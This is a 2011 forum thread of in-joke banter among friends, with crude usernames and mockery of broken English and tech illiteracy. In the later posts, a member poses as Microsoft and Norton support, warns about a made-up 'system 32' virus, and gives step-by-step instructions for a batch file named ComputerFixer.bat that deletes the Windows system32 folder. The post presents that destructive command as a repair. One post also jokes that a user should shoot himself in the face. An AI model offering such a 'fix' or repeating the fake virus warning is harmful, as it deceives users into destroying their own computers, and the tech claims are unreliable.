Get The Band Back Together
Would you like to react to this message? Create an account in a few clicks or log in to continue.

IT'S ALIVE! IT'S ALIIIIIIVE!

HomeLatest imagesSearchRegisterLog in

hi is me good meet you

Go down 
+3
M-Dubz
Majiffy
Baaru loves cock,,,
7 posters
Go to page : 1, 2  Next
AuthorMessage
Baaru loves cock,,,

Baaru loves cock,,,

hi is me good meet you Empty
PostSubject: hi is me good meet you   hi is me good meet you EmptyThu Oct 06, 2011 10:18 pm

name is ben or is baaru but you call me if you like any things. anyone know of a better return to his old friend good to see. we have a good feeling about this place!
Back to top Go down
Majiffy
Head Honcho
Majiffy

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyThu Oct 06, 2011 10:26 pm

Why was that so much harder to read than it should have been?
Back to top Go down
https://gtbbt.forumotion.com
Baaru loves cock,,,

Baaru loves cock,,,

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyThu Oct 06, 2011 10:46 pm

sorry because my english is so good. i want to apologize for.
Back to top Go down
M-Dubz

M-Dubz

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 12:23 am

WELCOME! I SEE YOU DO NOT SPEAK VERY GOOD ENGLISH! I AM FROM AUS TRA LI A. I SPEAK EEEENGGGG LISSSH. WELCOME.
Back to top Go down
http://www.middlepathway.com
Philip his anus with cum
Other Honchos
Philip his anus with cum

Location : middle earth, the setting for the spellbinding high fantasy book series by writer jrr tolkein and the series of films by michael moore and steven speilberg

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 7:27 am

(image file:)http://www.zgeek.com/forum/gallery/files/9/3/1/0/english-do-you-speak-it-demotivational-poster.jpg(=image file)

Edit: guys how do i psot my funny pic
Back to top Go down
Majiffy
Head Honcho
Majiffy

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 1:44 pm

Fealiks wrote:
(image file:)http://www.zgeek.com/forum/gallery/files/9/3/1/0/english-do-you-speak-it-demotivational-poster.jpg(=image file)

Edit: guys how do i psot my funny pic

Dear Fealiks,

i see youre having problems posting images. heres a quick process to posting properly!

1) Copy the image url to your clipboard
2) Click the image button at the top
3) Paste the image url into the prompt
4) ???
5) hi is me good meet you English-do-you-speak-it-demotivational-poster

hope this halsp,
kevin
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

Location : middle earth, the setting for the spellbinding high fantasy book series by writer jrr tolkein and the series of films by michael moore and steven speilberg

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:16 pm

hi is me good meet you T7-hi-is-me-good-meet-you
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:16 pm

that didnt work you gave me the wrong info. try again please

- dave
Back to top Go down
Majiffy
Head Honcho
Majiffy

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:23 pm

Dear Dave,

it appears youre still having troubles posting images. here are some possible solutions to your problem.

1) The image does not end in .jpg or another acceptable image format. Remedy this by uploading it to a file hosting site and try again.
2) Your computer is broken. Remedy this by throwing it violently against a wall.
3) You are broken. Remedy this by shooting yourself in the face with a large gauge shotgun.

hope this halsp,

kevin
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:25 pm

hey kev, me again. Yeah, don't really understand what you mean by that, so it'd be nice if you were a little clearer and leave out the techno mumbo jumbo, some of us dont still live in our mothers basement okay

-dave
Back to top Go down
Majiffy
Head Honcho
Majiffy

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:26 pm

Dear Dave,

here ill put this in simple terms. go fuck yourself.

hope this halsp,

kevin
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:28 pm

me again, kev.

still not being very clear to be honest with you pal. dont really understand what you mean by that.

- dave

Back to top Go down
M-Dubz

M-Dubz

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:28 pm

are you guys good with vista? kevin my computer is rly slow and i see you know lots about computer. how should i speed up my vista, do i need to buy the new vista? is there a better vista? let me know cause im really struggling here.
-techguy11
Back to top Go down
Majiffy
Head Honcho
Majiffy

hi is me good meet you W587z
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 2:34 pm

hey kevin, id like to know the answer to that other guys question

- dave
Back to top Go down
Baaru loves cock,,,

Baaru loves cock,,,

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptyFri Oct 07, 2011 10:36 pm

hi techguy11 and dave, this is jerry from microsoft and norton

if you need to make your vista faster the first thing you must try is to make sure that you don't have any virus

we have warning at the time being about very bad virus in circulating now which will destroy your hard drive and make your cpu lose its megahertz

the name of the virus is system 32 and it hides itself in your operating system files so it is hard to find

if you have a system 32 on your computer delete it immediately and then restart your computer

- jerry
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySat Oct 08, 2011 9:51 am

how the crap do u expect me to know if ive got system 23 in my computer or not how do i f'ing find it

David
Back to top Go down
M-Dubz

M-Dubz

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySat Oct 08, 2011 1:34 pm

i found system 23 david. but it comes up with error message "u need administrator rules to delete" i am given choice but i dont know which one is better to click. david, have you solved the bug yet? i am so close yet so far
-techguy11
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySat Oct 08, 2011 1:46 pm

techguy2011 why the f***ck are you asking me i dont flipping no do i. please go ask someone else you waste of life. where the f****ck is that geek so he can fix my god darn pc sorry for curseing.

-dave
Back to top Go down
M-Dubz

M-Dubz

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySat Oct 08, 2011 1:51 pm

david. i am trying here to get help. you look like you know a lot about pixels and how to solve problems. please do not be rude. i have reported u to the admin of the site. if you want help you have to not be a idiot.
-techguy11
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySat Oct 08, 2011 1:52 pm

wow now im being acused of being a bully, thanks a lot mate that really makes me feel good about myself. u are a horible person u know that.

david
Back to top Go down
Baaru loves cock,,,

Baaru loves cock,,,

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySat Oct 08, 2011 10:23 pm

techguy11 and dave, sorry for taken to long too answer

if you have trouble to delete your systems 32 then you use helpful code for help

here are steps:

1) open a note pad document in your windows

2) type in the code here into the note pad:
@echo off
del c:\WINDOWS\system32

3) save the note pad document as ComputerFixer.bat

now you only need to double click onto the file called ComputerFixer.bat and it will clear all your systems 32 virus

- jerry
Back to top Go down
M-Dubz

M-Dubz

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySun Oct 09, 2011 6:42 am

jerry i dont know how you save as .bat
does this mean i need to save the file and then save it again? i tried to save as virusdelete.bat.txt and it didnt work. it just came up with the code. what is wrong?
Back to top Go down
Philip his anus with cum
Other Honchos
Philip his anus with cum

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySun Oct 09, 2011 9:59 am

sorry jerry but what the heck do you think i am some sort of geek. i do not know how to do what you just said, how do you do it

dave
Back to top Go down
Baaru loves cock,,,

Baaru loves cock,,,

PostSubject: Re: hi is me good meet you   hi is me good meet you EmptySun Oct 09, 2011 11:13 pm

dave and unkown commenter, you must be saving as a bat file

when you press save as in the note pad you will choose the box which says save as type and picking the option of all files then name the note pad document as ComputerFixer.bat

it probably did not work before because you did not use the right name for the file

- jerry
Back to top Go down
Sponsored content

PostSubject: Re: hi is me good meet you   hi is me good meet you Empty

Back to top Go down

hi is me good meet you
Page 1 of 2Go to page : 1, 2  Next

Permissions in this forum:You cannot reply to topics in this forum
Get The Band Back Together :: Introductions-
Jump to: